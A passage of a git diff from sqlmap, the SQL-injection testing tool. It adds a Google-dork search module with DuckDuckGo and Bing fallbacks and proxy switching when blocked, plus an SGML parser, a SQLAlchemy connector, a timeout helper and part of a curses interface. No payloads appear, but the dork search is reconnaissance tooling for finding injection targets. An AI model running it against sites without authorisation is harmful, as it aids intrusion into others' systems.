lib.core.settings import GOOGLE_CONSENT_COOKIE +from lib.core.settings import GOOGLE_REGEX +from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE +from lib.core.settings import UNICODE_ENCODING +from lib.request.basic import decodePage +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib +from thirdparty.socks import socks + +def _search(dork): + """ + This method performs the effective search on Google providing + the google dork and the Google session cookie + """ + + if not dork: + return None + + page = None + data = None + requestHeaders = {} + responseHeaders = {} + + requestHeaders[HTTP_HEADER.USER_AGENT] = dict(conf.httpHeaders).get(HTTP_HEADER.USER_AGENT, DUMMY_SEARCH_USER_AGENT) + requestHeaders[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE + requestHeaders[HTTP_HEADER.COOKIE] = GOOGLE_CONSENT_COOKIE + + try: + req = _urllib.request.Request("https://www.google.com/ncr", headers=requestHeaders) + conn = _urllib.request.urlopen(req) + except Exception as ex: + errMsg = "unable to connect to Google ('%s')" % getSafeExString(ex) + raise SqlmapConnectionException(errMsg) + + gpage = conf.googlePage if conf.googlePage > 1 else 1 + logger.info("using search result page #%d" % gpage) + + url = "https://www.google.com/search?" # NOTE: if consent fails, try to use the "http://" + url += "q=%s&" % urlencode(dork, convall=True) + url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search" + url += "&start=%d" % ((gpage - 1) * 100) + + try: + req = _urllib.request.Request(url, headers=requestHeaders) + conn = _urllib.request.urlopen(req) + + requestMsg = "HTTP request:\nGET %s" % url + requestMsg += " %s" % _http_client.HTTPConnection._http_vsn_str + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + page = conn.read() + code = conn.code + status = conn.msg + responseHeaders = conn.info() + + responseMsg = "HTTP response (%s - %d):\n" % (status, code) + + if conf.verbose <= 4: + responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) + elif conf.verbose > 4: + responseMsg += "%s\n%s\n" % (responseHeaders, page) + + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + except _urllib.error.HTTPError as ex: + try: + page = ex.read() + responseHeaders = ex.info() + except Exception as _: + warnMsg = "problem occurred while trying to get " + warnMsg += "an error page information (%s)" % getSafeExString(_) + logger.critical(warnMsg) + return None + except (_urllib.error.URLError, _http_client.error, socket.error, socket.timeout, socks.ProxyError): + errMsg = "unable to connect to Google" + raise SqlmapConnectionException(errMsg) + + page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) + + page = getUnicode(page) # Note: if decodePage call fails (Issue #4202) + + retVal = [_urllib.parse.unquote(match.group(1) or match.group(2)) for match in re.finditer(GOOGLE_REGEX, page, re.I)] + + if not retVal and "detected unusual traffic" in page: + warnMsg = "Google has detected 'unusual' traffic from " + warnMsg += "used IP address disabling further searches" + + if conf.proxyList: + raise SqlmapBaseException(warnMsg) + else: + logger.critical(warnMsg) + + if not retVal: + message = "no usable links found. What do you want to do?" 
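For orientation, the happy path above boils down to: request a search page with a browser-like User-Agent, read the HTML, and pull result links out with a regex. Below is a minimal standalone sketch of that idea; the URL parameters, the header, and the link regex are simplified stand-ins, not sqlmap's `GOOGLE_REGEX` or its header constants.

```python
import re
from urllib.parse import quote_plus
from urllib.request import Request, urlopen

def dork_search(dork, page=1):
    # Simplified fetch-and-extract; real result parsing needs a far more
    # specific pattern (see the GOOGLE_REGEX setting imported above).
    url = "https://www.google.com/search?q=%s&num=100&start=%d" % (quote_plus(dork), (page - 1) * 100)
    request = Request(url, headers={"User-Agent": "Mozilla/5.0"})
    html = urlopen(request).read().decode("utf-8", "replace")
    return [match.group(1) for match in re.finditer(r'href="(https?://[^"&]+)"', html)]

# Usage (requires network access):
# for link in dork_search('inurl:".php?id="'):
#     print(link)
```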
+ message += "\n[1] (re)try with DuckDuckGo (default)" + message += "\n[2] (re)try with Bing" + message += "\n[3] quit" + choice = readInput(message, default='1') + + if choice == '3': + raise SqlmapUserQuitException + elif choice == '2': + url = "https://www.bing.com/search?q=%s&first=%d" % (urlencode(dork, convall=True), (gpage - 1) * 10 + 1) + regex = BING_REGEX + else: + url = "https://html.duckduckgo.com/html/" + data = "q=%s&s=%d" % (urlencode(dork, convall=True), (gpage - 1) * 30) + regex = DUCKDUCKGO_REGEX + + try: + req = _urllib.request.Request(url, data=getBytes(data), headers=requestHeaders) + conn = _urllib.request.urlopen(req) + + requestMsg = "HTTP request:\nGET %s" % url + requestMsg += " %s" % _http_client.HTTPConnection._http_vsn_str + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + page = conn.read() + code = conn.code + status = conn.msg + responseHeaders = conn.info() + page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) + + responseMsg = "HTTP response (%s - %d):\n" % (status, code) + + if conf.verbose <= 4: + responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) + elif conf.verbose > 4: + responseMsg += "%s\n%s\n" % (responseHeaders, page) + + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + except _urllib.error.HTTPError as ex: + try: + page = ex.read() + page = decodePage(page, ex.headers.get("Content-Encoding"), ex.headers.get("Content-Type")) + except socket.timeout: + warnMsg = "connection timed out while trying " + warnMsg += "to get error page information (%d)" % ex.code + logger.critical(warnMsg) + return None + except: + errMsg = "unable to connect" + raise SqlmapConnectionException(errMsg) + + page = getUnicode(page) # Note: if decodePage call fails (Issue #4202) + + retVal = [_urllib.parse.unquote(match.group(1).replace("&", "&")) for match in re.finditer(regex, page, re.I | re.S)] + + if not retVal and "issue with the Tor Exit Node you are currently using" in page: + warnMsg = "DuckDuckGo has detected 'unusual' traffic from " + warnMsg += "used (Tor) IP address" + + if conf.proxyList: + raise SqlmapBaseException(warnMsg) + else: + logger.critical(warnMsg) + + return retVal + +@stackedmethod +def search(dork): + pushValue(kb.choices.redirect) + kb.choices.redirect = REDIRECTION.YES + + try: + return _search(dork) + except SqlmapBaseException as ex: + if conf.proxyList: + logger.critical(getSafeExString(ex)) + + warnMsg = "changing proxy" + logger.warning(warnMsg) + + conf.proxy = None + + setHTTPHandlers() + return search(dork) + else: + raise + finally: + kb.choices.redirect = popValue() + +def setHTTPHandlers(): # Cross-referenced function + raise NotImplementedError diff --git a/lib/utils/sgmllib.py b/lib/utils/sgmllib.py new file mode 100644 index 00000000000..afcdff95314 --- /dev/null +++ b/lib/utils/sgmllib.py @@ -0,0 +1,574 @@ +"""A parser for SGML, using the derived class as a static DTD.""" + +# Note: missing in Python3 + +# XXX This only supports those SGML features used by HTML. + +# XXX There should be a way to distinguish between PCDATA (parsed +# character data -- the normal case), RCDATA (replaceable character +# data -- only char and entity references and end tags are special) +# and CDATA (character data -- only end tags are special). RCDATA is +# not supported at all. 
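A short usage sketch for this vendored parser: the derived class acts as the DTD, so a `start_a()` method is picked up by `finish_starttag()` via its `'start_' + tag` naming convention. The import path assumes sqlmap's package layout is on `sys.path`.

```python
from lib.utils.sgmllib import SGMLParser

class LinkExtractor(SGMLParser):
    def reset(self):
        SGMLParser.reset(self)
        self.links = []

    def start_a(self, attrs):
        # attrs is a list of (name, value) pairs with quotes already stripped
        self.links.extend(value for name, value in attrs if name == "href")

parser = LinkExtractor()
parser.feed('<html><body><a href="/index.php?id=1">test</a></body></html>')
parser.close()
print(parser.links)  # ['/index.php?id=1']
```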
+ +from __future__ import print_function + +try: + import _markupbase as markupbase +except: + import markupbase + +import re + +__all__ = ["SGMLParser", "SGMLParseError"] + +# Regular expressions used for parsing + +interesting = re.compile('[&<]') +incomplete = re.compile('&([a-zA-Z][a-zA-Z0-9]*|#[0-9]*)?|' + '<([a-zA-Z][^<>]*|' + '/([a-zA-Z][^<>]*)?|' + '![^<>]*)?') + +entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]') +charref = re.compile('&#([0-9]+)[^0-9]') + +starttagopen = re.compile('<[>a-zA-Z]') +shorttagopen = re.compile('<[a-zA-Z][-.a-zA-Z0-9]*/') +shorttag = re.compile('<([a-zA-Z][-.a-zA-Z0-9]*)/([^/]*)/') +piclose = re.compile('>') +endbracket = re.compile('[<>]') +tagfind = re.compile('[a-zA-Z][-_.a-zA-Z0-9]*') +attrfind = re.compile( + r'\s*([a-zA-Z_][-:.a-zA-Z_0-9]*)(\s*=\s*' + r'(\'[^\']*\'|"[^"]*"|[][\-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~\'"@]*))?') + + +class SGMLParseError(RuntimeError): + """Exception raised for all parse errors.""" + pass + + +# SGML parser base class -- find tags and call handler functions. +# Usage: p = SGMLParser(); p.feed(data); ...; p.close(). +# The dtd is defined by deriving a class which defines methods +# with special names to handle tags: start_foo and end_foo to handle +# <foo> and </foo>, respectively, or do_foo to handle <foo> by itself. +# (Tags are converted to lower case for this purpose.) The data +# between tags is passed to the parser by calling self.handle_data() +# with some data as argument (the data may be split up in arbitrary +# chunks). Entity references are passed by calling +# self.handle_entityref() with the entity reference as argument. + +class SGMLParser(markupbase.ParserBase): + # Definition of entities -- derived classes may override + entity_or_charref = re.compile('&(?:' + '([a-zA-Z][-.a-zA-Z0-9]*)|#([0-9]+)' + ')(;?)') + + def __init__(self, verbose=0): + """Initialize and reset this instance.""" + self.verbose = verbose + self.reset() + + def reset(self): + """Reset this instance. Loses all unprocessed data.""" + self.__starttag_text = None + self.rawdata = '' + self.stack = [] + self.lasttag = '???' + self.nomoretags = 0 + self.literal = 0 + markupbase.ParserBase.reset(self) + + def setnomoretags(self): + """Enter literal mode (CDATA) till EOF. + + Intended for derived classes only. + """ + self.nomoretags = self.literal = 1 + + def setliteral(self, *args): + """Enter literal mode (CDATA). + + Intended for derived classes only. + """ + self.literal = 1 + + def feed(self, data): + """Feed some data to the parser. + + Call this as often as you want, with as little or as much text + as you want (may include '\n'). (This just saves the text, + all the processing is done by goahead().) + """ + + self.rawdata = self.rawdata + data + self.goahead(0) + + def close(self): + """Handle the remaining data.""" + self.goahead(1) + + def error(self, message): + raise SGMLParseError(message) + + # Internal -- handle data as far as reasonable. May leave state + # and data to be processed by a subsequent call. If 'end' is + # true, force handling all data as if followed by EOF marker. 
+ def goahead(self, end): + rawdata = self.rawdata + i = 0 + n = len(rawdata) + while i < n: + if self.nomoretags: + self.handle_data(rawdata[i:n]) + i = n + break + match = interesting.search(rawdata, i) + if match: + j = match.start() + else: + j = n + if i < j: + self.handle_data(rawdata[i:j]) + i = j + if i == n: + break + if rawdata[i] == '<': + if starttagopen.match(rawdata, i): + if self.literal: + self.handle_data(rawdata[i]) + i = i + 1 + continue + k = self.parse_starttag(i) + if k < 0: + break + i = k + continue + if rawdata.startswith("</", i): + k = self.parse_endtag(i) + if k < 0: + break + i = k + self.literal = 0 + continue + if self.literal: + if n > (i + 1): + self.handle_data("<") + i = i + 1 + else: + # incomplete + break + continue + if rawdata.startswith("<!--", i): + # Strictly speaking, a comment is --.*-- + # within a declaration tag <!...>. + # This should be removed, + # and comments handled only in parse_declaration. + k = self.parse_comment(i) + if k < 0: + break + i = k + continue + if rawdata.startswith("<?", i): + k = self.parse_pi(i) + if k < 0: + break + i = i + k + continue + if rawdata.startswith("<!", i): + # This is some sort of declaration; in "HTML as + # deployed," this should only be the document type + # declaration ("<!DOCTYPE html...>"). + k = self.parse_declaration(i) + if k < 0: + break + i = k + continue + elif rawdata[i] == '&': + if self.literal: + self.handle_data(rawdata[i]) + i = i + 1 + continue + match = charref.match(rawdata, i) + if match: + name = match.group(1) + self.handle_charref(name) + i = match.end(0) + if rawdata[i - 1] != ';': + i = i - 1 + continue + match = entityref.match(rawdata, i) + if match: + name = match.group(1) + self.handle_entityref(name) + i = match.end(0) + if rawdata[i - 1] != ';': + i = i - 1 + continue + else: + self.error('neither < nor & ??') + # We get here only if incomplete matches but + # nothing else + match = incomplete.match(rawdata, i) + if not match: + self.handle_data(rawdata[i]) + i = i + 1 + continue + j = match.end(0) + if j == n: + break # Really incomplete + self.handle_data(rawdata[i:j]) + i = j + # end while + if end and i < n: + self.handle_data(rawdata[i:n]) + i = n + self.rawdata = rawdata[i:] + # XXX if end: check for empty stack + + # Extensions for the DOCTYPE scanner: + _decl_otherchars = '=' + + # Internal -- parse processing instr, return length or -1 if not terminated + def parse_pi(self, i): + rawdata = self.rawdata + if rawdata[i:i + 2] != '<?': + self.error('unexpected call to parse_pi()') + match = piclose.search(rawdata, i + 2) + if not match: + return -1 + j = match.start(0) + self.handle_pi(rawdata[i + 2: j]) + j = match.end(0) + return j - i + + def get_starttag_text(self): + return self.__starttag_text + + # Internal -- handle starttag, return length or -1 if not terminated + def parse_starttag(self, i): + self.__starttag_text = None + start_pos = i + rawdata = self.rawdata + if shorttagopen.match(rawdata, i): + # SGML shorthand: <tag/data/ == <tag>data</tag> + # XXX Can data contain &... (entity or char refs)? + # XXX Can data contain < or > (tag characters)? + # XXX Can there be whitespace before the first /? 
+ match = shorttag.match(rawdata, i) + if not match: + return -1 + tag, data = match.group(1, 2) + self.__starttag_text = '<%s/' % tag + tag = tag.lower() + k = match.end(0) + self.finish_shorttag(tag, data) + self.__starttag_text = rawdata[start_pos:match.end(1) + 1] + return k + # XXX The following should skip matching quotes (' or ") + # As a shortcut way to exit, this isn't so bad, but shouldn't + # be used to locate the actual end of the start tag since the + # < or > characters may be embedded in an attribute value. + match = endbracket.search(rawdata, i + 1) + if not match: + return -1 + j = match.start(0) + # Now parse the data between i + 1 and j into a tag and attrs + attrs = [] + if rawdata[i:i + 2] == '<>': + # SGML shorthand: <> == <last open tag seen> + k = j + tag = self.lasttag + else: + match = tagfind.match(rawdata, i + 1) + if not match: + self.error('unexpected call to parse_starttag') + k = match.end(0) + tag = rawdata[i + 1:k].lower() + self.lasttag = tag + while k < j: + match = attrfind.match(rawdata, k) + if not match: + break + attrname, rest, attrvalue = match.group(1, 2, 3) + if not rest: + attrvalue = attrname + else: + if (attrvalue[:1] == "'" == attrvalue[-1:] or + attrvalue[:1] == '"' == attrvalue[-1:]): + # strip quotes + attrvalue = attrvalue[1:-1] + attrvalue = self.entity_or_charref.sub( + self._convert_ref, attrvalue) + attrs.append((attrname.lower(), attrvalue)) + k = match.end(0) + if rawdata[j] == '>': + j = j + 1 + self.__starttag_text = rawdata[start_pos:j] + self.finish_starttag(tag, attrs) + return j + + # Internal -- convert entity or character reference + def _convert_ref(self, match): + if match.group(2): + return self.convert_charref(match.group(2)) or \ + '&#%s%s' % match.groups()[1:] + elif match.group(3): + return self.convert_entityref(match.group(1)) or \ + '&%s;' % match.group(1) + else: + return '&%s' % match.group(1) + + # Internal -- parse endtag + def parse_endtag(self, i): + rawdata = self.rawdata + match = endbracket.search(rawdata, i + 1) + if not match: + return -1 + j = match.start(0) + tag = rawdata[i + 2:j].strip().lower() + if rawdata[j] == '>': + j = j + 1 + self.finish_endtag(tag) + return j + + # Internal -- finish parsing of <tag/data/ (same as <tag>data</tag>) + def finish_shorttag(self, tag, data): + self.finish_starttag(tag, []) + self.handle_data(data) + self.finish_endtag(tag) + + # Internal -- finish processing of start tag + # Return -1 for unknown tag, 0 for open-only tag, 1 for balanced tag + def finish_starttag(self, tag, attrs): + try: + method = getattr(self, 'start_' + tag) + except AttributeError: + try: + method = getattr(self, 'do_' + tag) + except AttributeError: + self.unknown_starttag(tag, attrs) + return -1 + else: + self.handle_starttag(tag, method, attrs) + return 0 + else: + self.stack.append(tag) + self.handle_starttag(tag, method, attrs) + return 1 + + # Internal -- finish processing of end tag + def finish_endtag(self, tag): + if not tag: + found = len(self.stack) - 1 + if found < 0: + self.unknown_endtag(tag) + return + else: + if tag not in self.stack: + try: + method = getattr(self, 'end_' + tag) + except AttributeError: + self.unknown_endtag(tag) + else: + self.report_unbalanced(tag) + return + found = len(self.stack) + for i in range(found): + if self.stack[i] == tag: + found = i + while len(self.stack) > found: + tag = self.stack[-1] + try: + method = getattr(self, 'end_' + tag) + except AttributeError: + method = None + if method: + self.handle_endtag(tag, method) + else: + 
self.unknown_endtag(tag) + del self.stack[-1] + + # Overridable -- handle start tag + def handle_starttag(self, tag, method, attrs): + method(attrs) + + # Overridable -- handle end tag + def handle_endtag(self, tag, method): + method() + + # Example -- report an unbalanced </...> tag. + def report_unbalanced(self, tag): + if self.verbose: + print('*** Unbalanced </' + tag + '>') + print('*** Stack:', self.stack) + + def convert_charref(self, name): + """Convert character reference, may be overridden.""" + try: + n = int(name) + except ValueError: + return + if not 0 <= n <= 127: + return + return self.convert_codepoint(n) + + def convert_codepoint(self, codepoint): + return chr(codepoint) + + def handle_charref(self, name): + """Handle character reference, no need to override.""" + replacement = self.convert_charref(name) + if replacement is None: + self.unknown_charref(name) + else: + self.handle_data(replacement) + + # Definition of entities -- derived classes may override + entitydefs = \ + {'lt': '<', 'gt': '>', 'amp': '&', 'quot': '"', 'apos': '\''} + + def convert_entityref(self, name): + """Convert entity references. + + As an alternative to overriding this method; one can tailor the + results by setting up the self.entitydefs mapping appropriately. + """ + table = self.entitydefs + if name in table: + return table[name] + else: + return + + def handle_entityref(self, name): + """Handle entity references, no need to override.""" + replacement = self.convert_entityref(name) + if replacement is None: + self.unknown_entityref(name) + else: + self.handle_data(replacement) + + # Example -- handle data, should be overridden + def handle_data(self, data): + pass + + # Example -- handle comment, could be overridden + def handle_comment(self, data): + pass + + # Example -- handle declaration, could be overridden + def handle_decl(self, decl): + pass + + # Example -- handle processing instruction, could be overridden + def handle_pi(self, data): + pass + + # To be overridden -- handlers for unknown objects + def unknown_starttag(self, tag, attrs): + pass + + def unknown_endtag(self, tag): + pass + + def unknown_charref(self, ref): + pass + + def unknown_entityref(self, ref): + pass + + +class TestSGMLParser(SGMLParser): + + def __init__(self, verbose=0): + self.testdata = "" + SGMLParser.__init__(self, verbose) + + def handle_data(self, data): + self.testdata = self.testdata + data + if len(repr(self.testdata)) >= 70: + self.flush() + + def flush(self): + data = self.testdata + if data: + self.testdata = "" + print('data:', repr(data)) + + def handle_comment(self, data): + self.flush() + r = repr(data) + if len(r) > 68: + r = r[:32] + '...' 
+ r[-32:] + print('comment:', r) + + def unknown_starttag(self, tag, attrs): + self.flush() + if not attrs: + print('start tag: <' + tag + '>') + else: + print('start tag: <' + tag, end=' ') + for name, value in attrs: + print(name + '=' + '"' + value + '"', end=' ') + print('>') + + def unknown_endtag(self, tag): + self.flush() + print('end tag: </' + tag + '>') + + def unknown_entityref(self, ref): + self.flush() + print('*** unknown entity ref: &' + ref + ';') + + def unknown_charref(self, ref): + self.flush() + print('*** unknown char ref: &#' + ref + ';') + + def unknown_decl(self, data): + self.flush() + print('*** unknown decl: [' + data + ']') + + def close(self): + SGMLParser.close(self) + self.flush() + + +def test(args=None): + import sys + + if args is None: + args = sys.argv[1:] + + if args and args[0] == '-s': + args = args[1:] + klass = SGMLParser + else: + klass = TestSGMLParser + + if args: + file = args[0] + else: + file = 'test.html' + + if file == '-': + f = sys.stdin + else: + try: + f = open(file, 'r') + except IOError as msg: + print(file, ":", msg) + sys.exit(1) + + data = f.read() + if f is not sys.stdin: + f.close() + + x = klass() + for c in data: + x.feed(c) + x.close() + + +if __name__ == '__main__': + test() diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py new file mode 100644 index 00000000000..7506b42a79f --- /dev/null +++ b/lib/utils/sqlalchemy.py @@ -0,0 +1,139 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import importlib +import logging +import os +import re +import sys +import traceback +import warnings + +_path = list(sys.path) +_sqlalchemy = None +try: + sys.path = sys.path[1:] + module = importlib.import_module("sqlalchemy") + if hasattr(module, "dialects"): + _sqlalchemy = module + warnings.simplefilter(action="ignore", category=_sqlalchemy.exc.SAWarning) +except: + pass +finally: + sys.path = _path + +try: + import MySQLdb # used by SQLAlchemy in case of MySQL + warnings.filterwarnings("error", category=MySQLdb.Warning) +except (ImportError, AttributeError): + pass + +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapFilePathException +from lib.core.exception import SqlmapMissingDependence +from plugins.generic.connector import Connector as GenericConnector +from thirdparty import six +from thirdparty.six.moves import urllib as _urllib + +def getSafeExString(ex, encoding=None): # Cross-referenced function + raise NotImplementedError + +class SQLAlchemy(GenericConnector): + def __init__(self, dialect=None): + GenericConnector.__init__(self) + + self.dialect = dialect + self.address = conf.direct + + if conf.dbmsUser: + self.address = self.address.replace("'%s':" % conf.dbmsUser, "%s:" % _urllib.parse.quote(conf.dbmsUser)) + self.address = self.address.replace("%s:" % conf.dbmsUser, "%s:" % _urllib.parse.quote(conf.dbmsUser)) + + if conf.dbmsPass: + self.address = self.address.replace(":'%s'@" % conf.dbmsPass, ":%s@" % _urllib.parse.quote(conf.dbmsPass)) + self.address = self.address.replace(":%s@" % conf.dbmsPass, ":%s@" % _urllib.parse.quote(conf.dbmsPass)) + + if self.dialect: + self.address = re.sub(r"\A.+://", "%s://" % self.dialect, self.address) + + def connect(self): + if _sqlalchemy: + self.initConnection() + + try: + if not self.port and self.db: + if not os.path.exists(self.db): + raise 
SqlmapFilePathException("the provided database file '%s' does not exist" % self.db) + + _ = self.address.split("//", 1) + self.address = "%s////%s" % (_[0], os.path.abspath(self.db)) + + if self.dialect == "sqlite": + engine = _sqlalchemy.create_engine(self.address, connect_args={"check_same_thread": False}) + elif self.dialect == "oracle": + engine = _sqlalchemy.create_engine(self.address) + else: + engine = _sqlalchemy.create_engine(self.address, connect_args={}) + + self.connector = engine.connect() + except (TypeError, ValueError): + if "_get_server_version_info" in traceback.format_exc(): + try: + import pymssql + if int(pymssql.__version__[0]) < 2: + raise SqlmapConnectionException("SQLAlchemy connection issue (obsolete version of pymssql ('%s') is causing problems)" % pymssql.__version__) + except ImportError: + pass + elif "invalid literal for int() with base 10: '0b" in traceback.format_exc(): + raise SqlmapConnectionException("SQLAlchemy connection issue ('https://bitbucket.org/zzzeek/sqlalchemy/issues/3975')") + else: + pass + except SqlmapFilePathException: + raise + except Exception as ex: + raise SqlmapConnectionException("SQLAlchemy connection issue ('%s')" % getSafeExString(ex)) + + self.printConnected() + else: + raise SqlmapMissingDependence("SQLAlchemy not available (e.g. 'pip%s install SQLAlchemy')" % ('3' if six.PY3 else "")) + + def fetchall(self): + try: + retVal = [] + for row in self.cursor.fetchall(): + retVal.append(tuple(row)) + return retVal + except _sqlalchemy.exc.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + retVal = False + + # Reference: https://stackoverflow.com/a/69491015 + if hasattr(_sqlalchemy, "text"): + query = _sqlalchemy.text(query) + + try: + self.cursor = self.connector.execute(query) + retVal = True + except (_sqlalchemy.exc.OperationalError, _sqlalchemy.exc.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except _sqlalchemy.exc.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + return retVal + + def select(self, query): + retVal = None + + if self.execute(query): + retVal = self.fetchall() + + return retVal diff --git a/lib/utils/timeout.py b/lib/utils/timeout.py index 5d41708f387..0b252547e00 100644 --- a/lib/utils/timeout.py +++ b/lib/utils/timeout.py @@ -1,33 +1,37 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import threading from lib.core.data import logger from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import TIMEOUT_STATE -def timeout(func, args=(), kwargs={}, duration=1, default=None): +def timeout(func, args=None, kwargs=None, duration=1, default=None): class InterruptableThread(threading.Thread): def __init__(self): threading.Thread.__init__(self) self.result = None + self.timeout_state = None def run(self): try: - self.result = func(*args, **kwargs) - except Exception, msg: - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, msg) + self.result = func(*(args or ()), **(kwargs or {})) + self.timeout_state = TIMEOUT_STATE.NORMAL + except Exception as ex: + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, ex) self.result = default + self.timeout_state = TIMEOUT_STATE.EXCEPTION thread = 
InterruptableThread() thread.start() thread.join(duration) - if thread.isAlive(): - return default + if thread.is_alive(): + return default, TIMEOUT_STATE.TIMEOUT else: - return thread.result + return thread.result, thread.timeout_state diff --git a/lib/utils/tui.py b/lib/utils/tui.py new file mode 100644 index 00000000000..d785e5f7673 --- /dev/null +++ b/lib/utils/tui.py @@ -0,0 +1,768 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import subprocess +import sys +import tempfile + +try: + import curses +except ImportError: + curses = None + +from lib.core.common import getSafeExString +from lib.core.common import saveConfig +from lib.core.data import paths +from lib.core.defaults import defaults +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.exception import SqlmapMissingDependence +from lib.core.exception import SqlmapSystemException +from lib.core.settings import IS_WIN +from thirdparty.six.moves import configparser as _configparser + +class NcursesUI: + def __init__(self, stdscr, parser): + self.stdscr = stdscr + self.parser = parser + self.current_tab = 0 + self.current_field = 0 + self.scroll_offset = 0 + self.tabs = [] + self.fields = {} + self.running = False + self.process = None + + # Initialize colors + curses.start_color() + curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_CYAN) # Header + curses.init_pair(2, curses.COLOR_WHITE, curses.COLOR_BLUE) # Active tab + curses.init_pair(3, curses.COLOR_BLACK, curses.COLOR_WHITE) # Inactive tab + curses.init_pair(4, curses.COLOR_YELLOW, curses.COLOR_BLACK) # Selected field + curses.init_pair(5, curses.COLOR_GREEN, curses.COLOR_BLACK) # Help text + curses.init_pair(6, curses.COLOR_RED, curses.COLOR_BLACK) # Error/Important + curses.init_pair(7, curses.COLOR_CYAN, curses.COLOR_BLACK) # Label + + # Setup curses + curses.curs_set(1) + self.stdscr.keypad(1) + + # Parse option groups + self._parse_options() + + def _parse_options(self): + """Parse command line options into tabs and fields""" + for group in self.parser.option_groups: + tab_data = { + 'title': group.title, + 'description': group.get_description() if hasattr(group, 'get_description') and group.get_description() else "", + 'options': [] + } + + for option in group.option_list: + field_data = { + 'dest': option.dest, + 'label': self._format_option_strings(option), + 'help': option.help if option.help else "", + 'type': option.type if hasattr(option, 'type') and option.type else 'bool', + 'value': '', + 'default': defaults.get(option.dest) if defaults.get(option.dest) else None + } + tab_data['options'].append(field_data) + self.fields[(group.title, option.dest)] = field_data + + self.tabs.append(tab_data) + + def _format_option_strings(self, option): + """Format option strings for display""" + parts = [] + if hasattr(option, '_short_opts') and option._short_opts: + parts.extend(option._short_opts) + if hasattr(option, '_long_opts') and option._long_opts: + parts.extend(option._long_opts) + return ', '.join(parts) + + def _draw_header(self): + """Draw the header bar""" + height, width = self.stdscr.getmaxyx() + header = " sqlmap - ncurses TUI " + self.stdscr.attron(curses.color_pair(1) | curses.A_BOLD) + self.stdscr.addstr(0, 0, header.center(width)) + self.stdscr.attroff(curses.color_pair(1) | curses.A_BOLD) + + def _get_tab_bar_height(self): + """Calculate how many rows the tab bar uses""" + height, width = self.stdscr.getmaxyx() + y = 1 + x = 0 + + 
for i, tab in enumerate(self.tabs): + tab_text = " %s " % tab['title'] + + # Check if tab exceeds width, wrap to next line + if x + len(tab_text) >= width: + y += 1 + x = 0 + # Stop if we've used too many lines + if y >= 3: + break + + x += len(tab_text) + 1 + + return y + + def _draw_tabs(self): + """Draw the tab bar""" + height, width = self.stdscr.getmaxyx() + y = 1 + x = 0 + + for i, tab in enumerate(self.tabs): + tab_text = " %s " % tab['title'] + + # Check if tab exceeds width, wrap to next line + if x + len(tab_text) >= width: + y += 1 + x = 0 + # Stop if we've used too many lines + if y >= 3: + break + + if i == self.current_tab: + self.stdscr.attron(curses.color_pair(2) | curses.A_BOLD) + else: + self.stdscr.attron(curses.color_pair(3)) + + try: + self.stdscr.addstr(y, x, tab_text) + except: + pass + + if i == self.current_tab: + self.stdscr.attroff(curses.color_pair(2) | curses.A_BOLD) + else: + self.stdscr.attroff(curses.color_pair(3)) + + x += len(tab_text) + 1 + + def _draw_footer(self): + """Draw the footer with help text""" + height, width = self.stdscr.getmaxyx() + footer = " [Tab] Next | [Arrows] Navigate | [Enter] Edit | [F2] Run | [F3] Export | [F4] Import | [F10] Quit " + + try: + self.stdscr.attron(curses.color_pair(1)) + self.stdscr.addstr(height - 1, 0, footer.ljust(width)) + self.stdscr.attroff(curses.color_pair(1)) + except: + pass + + def _draw_current_tab(self): + """Draw the current tab content""" + height, width = self.stdscr.getmaxyx() + tab = self.tabs[self.current_tab] + + # Calculate tab bar height + tab_bar_height = self._get_tab_bar_height() + start_y = tab_bar_height + 1 + + # Clear content area + for y in range(start_y, height - 1): + try: + self.stdscr.addstr(y, 0, " " * width) + except: + pass + + y = start_y + + # Draw description if exists + if tab['description']: + desc_lines = self._wrap_text(tab['description'], width - 4) + for line in desc_lines[:2]: # Limit to 2 lines + try: + self.stdscr.attron(curses.color_pair(5)) + self.stdscr.addstr(y, 2, line) + self.stdscr.attroff(curses.color_pair(5)) + y += 1 + except: + pass + y += 1 + + # Draw options + visible_start = self.scroll_offset + visible_end = visible_start + (height - y - 2) + + for i, option in enumerate(tab['options'][visible_start:visible_end], visible_start): + if y >= height - 2: + break + + is_selected = (i == self.current_field) + + # Draw label + label = option['label'][:25].ljust(25) + try: + if is_selected: + self.stdscr.attron(curses.color_pair(4) | curses.A_BOLD) + else: + 